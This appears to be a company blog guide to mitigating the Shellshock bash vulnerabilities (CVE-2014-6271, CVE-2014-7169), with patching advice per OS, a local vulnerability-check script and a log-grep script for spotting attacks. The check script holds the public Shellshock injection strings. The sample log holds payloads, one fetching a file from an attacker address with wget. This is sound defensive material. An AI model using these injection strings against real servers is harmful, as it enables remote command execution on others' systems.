CVE-2014-6271 and CVE-2014-7169, also known as “Shellshock”, are high impact vulnerabilities affecting the Bourne Again Shell (Bash). The flaw is in how Bash imports function definitions from environment variables: code placed after the function body is executed when Bash starts, so any service that passes attacker-controlled input into the environment of a Bash process can be tricked into running arbitrary commands. The result can be unauthorized disclosure of information, unauthorized modification, and disruption of service. Because this is such a big threat, and because at Clever we take security seriously, we’ve decided to assemble a guide to mitigation.
Updating Bash
Two patches have been released in the past two days: the first addresses the initially reported bug (CVE-2014-6271), the second a subsequently discovered (and relatively minor) weakness in that first patch (CVE-2014-7169). Since the first patch is incomplete on its own, make sure the update you apply covers both. See below for vendor specific information regarding patching.
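Before and after updating, it is worth confirming what your installed bash actually does. The script below is an added example, not something from the original post or from any vendor advisory; it wraps the two widely published test strings for the CVEs above in functions that report “vulnerable” or “patched” (or “no-bash” if bash is not on the PATH). The CVE-2014-7169 check writes into a temporary directory because the malformed definition it sends makes an unpatched bash treat the next word as a redirection, leaving behind a file named `echo`.

```shell
#!/bin/sh
# Added example: probe the local bash for CVE-2014-6271 and CVE-2014-7169.
# Both test strings are the public ones that circulated with the advisories;
# each exports a crafted function definition through the environment and
# observes whether bash runs the trailing code.

# CVE-2014-6271: an unpatched bash executes "echo vulnerable" after importing
# the function x; a patched bash ignores the variable and prints only "ok".
check_6271() {
    if ! command -v bash >/dev/null 2>&1; then
        echo "no-bash"
        return
    fi
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo ok' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo "vulnerable" ;;
        *)            echo "patched" ;;
    esac
}

# CVE-2014-7169: the incomplete first fix still let a malformed definition
# corrupt the parser, so "echo date" becomes "date > echo". We run the probe
# in a scratch directory and check whether a file called "echo" appeared.
check_7169() {
    if ! command -v bash >/dev/null 2>&1; then
        echo "no-bash"
        return
    fi
    dir=$(mktemp -d) || { echo "error"; return; }
    ( cd "$dir" && env X='() { (a)=>\' bash -c 'echo date' >/dev/null 2>&1 )
    if [ -e "$dir/echo" ]; then
        result="vulnerable"
    else
        result="patched"
    fi
    rm -rf "$dir"
    echo "$result"
}

# Overall verdict: exit 0 only when neither probe reports "vulnerable".
shellshock_status() {
    r1=$(check_6271)
    r2=$(check_7169)
    echo "CVE-2014-6271: $r1"
    echo "CVE-2014-7169: $r2"
    [ "$r1" != "vulnerable" ] && [ "$r2" != "vulnerable" ]
}

shellshock_status
```

Run it as a normal user; it does not need root, and it only touches a directory created by `mktemp`. A “vulnerable” on either line means the package update has not landed yet (or a second copy of bash, for example one bundled with another application, is being picked up first).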
*nix Distributions
The following distributions have added fixes to their respective repositories; updating simply requires the built-in system update tools.
- Ubuntu
- Fedora/RHEL/CentOS
- Debian
- Oracle
- Others – see this curated list of solutions (reddit)
Mac OS X
If you have OS X Mavericks, you can download the fix here: OS X bash Update 1.0
If you have a different version of the operating system, the recommended course of action is to wait for Apple’s official response, unless you know that your system is exposing ports publicly on the internet. See these instructions for a way that power users can close the hole immediately.
Windows
While most Windows users may assume they are in the clear, a few special cases bring Bash onto Windows:
- MSYS includes bash
- cygwin includes bash
- other applications such as msysgit may have installed these packages behind the scenes
Also see the section entitled “All our things are on the Microsoft stack, are we at risk?” in Troy Hunt’s excellent writeup.
Discovering Attack Attempts
Because there undoubtedly was a period of time between the initial reports and the eventual fixes for the bug, it’s important to at least attempt to discover any attacks or intrusions into your systems. The popular NIDS tool “Snort” already has a set of detection rules in v2.9.
We leave it to advanced readers to parse logs to discover attack attempts on their own.
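For those who do want a starting point, the following is an added example (not part of the original post) of the simplest useful log check. Every Shellshock payload has to begin with the function-definition prefix `() {` in order to be imported by Bash, and for web servers that string arrives in request headers that land in the access log (most often User-Agent and Referer). The sample log lines below are constructed for the example, with RFC 5737 documentation addresses; they are not real traffic.

```shell
#!/bin/sh
# Added example: pull Shellshock attempts out of web server access logs.
# Works on combined-format logs from Apache or nginx, read from files
# given as arguments or from stdin.

# Constructed sample (not real traffic): two lines carry the signature in
# the User-Agent and Referer fields, the middle one is a benign request.
SAMPLE_LOG='203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "() { :;}; /bin/bash -c \"wget http://203.0.113.99/x -O /tmp/x\""
198.51.100.7 - - [25/Sep/2014:10:02:15 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Sep/2014:10:03:44 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 500 0 "() { :; }; ping -c 1 203.0.113.99" "curl/7.30"'

# Print every log line containing the function-definition prefix. The regex
# tolerates any amount of whitespace between "()" and "{", which is the only
# variation the Bash parser itself allows, so it catches the known payload
# forms without depending on the command that follows.
shellshock_grep() {
    grep -E '\(\) *\{' "$@"
}

# Number of matching lines (tr strips the leading spaces some wc print).
shellshock_count() {
    shellshock_grep "$@" | wc -l | tr -d ' '
}

# Source addresses ranked by number of attempts; the first field of a
# combined-format line is the client IP.
shellshock_sources() {
    shellshock_grep "$@" | awk '{ print $1 }' | sort | uniq -c | sort -rn
}

# Demonstration on the constructed sample. In practice point the functions
# at the real logs, e.g.: shellshock_sources /var/log/apache2/access.log*
printf '%s\n' "$SAMPLE_LOG" | shellshock_grep
printf '%s\n' "$SAMPLE_LOG" | shellshock_sources
```

A hit only proves that an attempt reached the server, not that it succeeded. For each matching line, check whether the requested path was actually served by a CGI script or anything else that spawns Bash, and look for the side effects the payload asked for (downloaded files in `/tmp`, unexpected outbound connections, new cron entries). Lines with a 500 status deserve particular attention, since a shell that started executing the payload often fails to produce valid CGI output.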
Sources and links
- CVE-2014-6271 original vulnerability
- CVE-2014-7169 subsequent vulnerability
- Symantec has created an informative graphic of the command line exploit
- Excellent information available from Rapid7
- Public Scanners (use at your own risk!!)